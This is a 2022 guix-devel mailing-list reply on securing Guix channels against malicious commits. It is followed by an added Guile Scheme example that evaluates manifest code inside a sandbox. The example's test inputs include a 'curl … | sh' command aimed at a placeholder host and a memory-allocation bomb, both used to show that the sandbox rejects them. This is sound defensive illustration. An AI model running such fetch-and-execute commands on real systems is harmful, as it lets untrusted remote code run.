From: Zhu Zihao
To: Ludovic Courtès
Cc: guix-science@gnu.org, guix-devel@gnu.org
Subject: Re: “Building a Secure Software Supply Chain with GNU Guix”
Date: Mon, 18 Jul 2022 17:40:53 +0800
In-reply-to: <87k08a4xmy.fsf@inria.fr>
Message-ID: <86v8rug31z.fsf@163.com>
References: <87zghu5jex.fsf@inria.fr> <86fsj0nnxy.fsf@163.com> <87k08a4xmy.fsf@inria.fr>
List-Id: guix-devel@gnu.org ("Development of GNU Guix and the GNU System distribution.")

Ludovic Courtès writes:

>> We have PGP signing and a git commit chain to make sure the commits are
>> committed by trusted people. But it's still possible for the channel
>> owner to inject malicious code into the channel in a future commit. Like
>> what Marak Squires did in the faker.js project :( or the committer of Guix
>> was attacked by an evil maid.
>
> I'm not aware of the faker.js story, do you have a link?

https://www.bleepingcomputer.com/news/security/dev-corrupts-npm-libs-colors-and-faker-breaking-thousands-of-apps/

Here's a detailed report about Marak and faker.js.

>> In Nix flakes, there's pure evaluation to make sure no side-effectful
>> code is allowed. But a Guix channel is less restricted than a Nix flake.
>> It's an important problem to make sure the evaluation is safe for the user.
>
> Yes, I understand. I don't think that makes a practical difference
> though: when you pull from a Guix channel or fetch a Nix flake, that's
> because you want to install software according to what that
> channel/flake provides. So whether evil code is in the channel/flake
> (as Scheme/Nix code) or in the package(s) themselves makes little
> difference.
>
> Does that make sense?

My two cents:

When deploying a manifest, we use `guix package -p -m`. This command consists of two parts. Guix will first evaluate the packages specified in the manifest and build the profile, and then populate the profile to the given destination. The first part can be done in a sandboxed environment, or under a non-privileged account like "nobody".
-- 
Retrieve my PGP public key: gpg --recv-keys 481F5EEEBA425ADC13247C76A6E672D981B8E744

Zihao
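The "evaluate first, in a sandbox; populate the profile afterwards" split sketched above can be illustrated with Guile's own `(ice-9 sandbox)` module. The following is an added example written for this thread; it is not code from Guix or from either participant. It assumes a Guile with `(ice-9 sandbox)` (Guile 2.2 or later) and uses constructed expressions standing in for the manifest code a channel might ship. The caveat that matters in practice: a real Guix manifest needs `(gnu packages)` and `(guix profiles)` bindings, which are not in the pure binding set, so this shows only the isolation mechanism (no I/O, no `system`, CPU and allocation budgets) that such a first phase would need to wrap, with `evaluate-untrusted` being a hypothetical helper name.

```scheme
;; Added illustration, not Guix code: evaluate manifest-like Scheme in a
;; Guile sandbox before anything is allowed to touch the user's profile.
(use-modules (ice-9 sandbox))

;; Evaluate EXP with only pure bindings (no ports, no `system', no module
;; access), a CPU-time budget in seconds and an allocation budget in bytes.
;; Returns two values: a status symbol and either the result or the
;; exception payload, so the caller can decide whether to proceed to the
;; privileged "populate the profile" phase.
(define* (evaluate-untrusted exp #:key (seconds 1) (bytes 50e6))
  (catch #t
    (lambda ()
      (values 'ok
              (eval-in-sandbox exp
                               #:time-limit seconds
                               #:allocation-limit bytes
                               #:bindings all-pure-bindings)))
    (lambda (key . args)
      ;; `unbound-variable' for anything outside the pure set (file I/O,
      ;; `system', `primitive-load', ...); `limit-exceeded' for runaway
      ;; loops or allocation bombs.
      (values 'rejected (cons key args)))))

;; Constructed inputs (not from any real channel): one benign
;; manifest-style expression and two hostile ones modelled on what a
;; compromised channel commit could ship.
(define benign '(list (string-append "hello@" "2.12") "guile"))
(define exfil  '(system "curl https://example.invalid/x | sh"))
(define bomb   '(let loop ((x '())) (loop (cons x x))))

(for-each
 (lambda (exp)
   (call-with-values (lambda () (evaluate-untrusted exp))
     (lambda (status payload)
       (format #t "~s~%  => ~a ~s~%" exp status payload))))
 (list benign exfil bomb))
```

The benign expression evaluates to a plain list of specifications, which is all a later, privileged step needs to build and populate a profile; the `system` call is rejected because the name is simply not bound inside the sandbox module, and the allocation bomb is cut off by the budget rather than exhausting the host. Running the evaluation under a separate account such as "nobody" adds a second, OS-level boundary on top of this language-level one.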